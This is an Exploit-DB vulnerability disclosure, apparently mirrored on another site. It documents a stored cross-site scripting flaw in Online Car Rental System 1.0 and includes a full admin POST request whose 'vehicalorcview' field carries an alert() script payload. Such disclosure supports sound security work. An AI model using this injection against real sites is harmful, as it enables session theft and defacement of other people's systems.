Online Car Rental System 1.0 – Stored Cross Site Scripting - 体验盒子

作者： Naved Shaikh
日期： 2021-02-09
类别：
webapps
平台：
php
来源：https://www.exploit-db.com/exploits/49546/
# Exploit Title: Online Car Rental System 1.0 - Stored Cross Site Scripting
# Date: 9/2/2021
# Exploit Author: Naved Shaikh
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/cc/14145/online-car-rental-system-using-phpmysql.html
# Version:V 1.0
# Tested on Windows 10, XAMPP

Steps:
1) Open http://localhost/car-rental/admin/post-avehical.php 

2) Fill All the details on the page. After submitting, capture the request and change the "vehicalorcview" parameter with our Payload "<script>alert("CAR")</script>" and submit

3) Open the http://localhost/car-rental/ and our Payload excuted.

Request
POST /car-rental/admin/post-avehical.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13786099262839578593645594965
Content-Length: 2724377
Origin: http://localhost
Connection: close
Referer: http://localhost/car-rental/admin/post-avehical.php
Cookie: PHPSESSID=h5ubatunno8u9130c4eq77anf2
Upgrade-Insecure-Requests: 1

-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="vehicletitle"

TestName
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="brandname"

2
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="vehicalorcview"

<script>alert("CAR")</script>
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="priceperday"

200
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="fueltype"

Diesel
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="modelyear"

2008
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="seatingcapacity"

22
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="img1"; filename="Untitled.png"
Content-Type: image/png

PNG

-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="img5"; filename=""
Content-Type: application/octet-stream


-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="powerdoorlocks"

1
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="antilockbrakingsys"

1
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="driverairbag"

1
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="passengerairbag"

1
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="centrallocking"

1
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="crashcensor"

1
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="submit"


-----------------------------13786099262839578593645594965--